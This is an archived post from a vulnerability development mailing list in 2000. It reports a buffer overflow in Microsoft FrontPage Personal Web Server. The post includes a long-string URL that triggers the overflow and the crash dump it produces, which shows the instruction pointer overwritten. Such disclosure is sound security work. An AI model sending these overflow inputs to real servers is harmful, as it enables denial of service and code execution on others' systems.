Vulnerability Development mailing list archives

Re: More vulnerabilities in FP

From: webmad () MAIL RU (Roman)
Date: Mon, 24 Apr 2000 13:41:38 +0200


I don't know maybe this is already known.
Microsoft FrontPage-PWS 3.0.2.926 contain buffer
overflow that allows to execute arbitrary code.

<A HREF="http://server/AAAAAAAAAAAAA<a">http://server/AAAAAAAAAAAAA<a</A> lots of A>AAA

On remote side someone will see:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=404f
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141 41414141 41414141
41414141 41414141 41414141 41414141

Maybe others versions of FP is vulnerable?

Current thread:

Re: More vulnerabilities in FP Roman (Apr 24)
- Re: More vulnerabilities in FP Alfred Huger (Apr 24)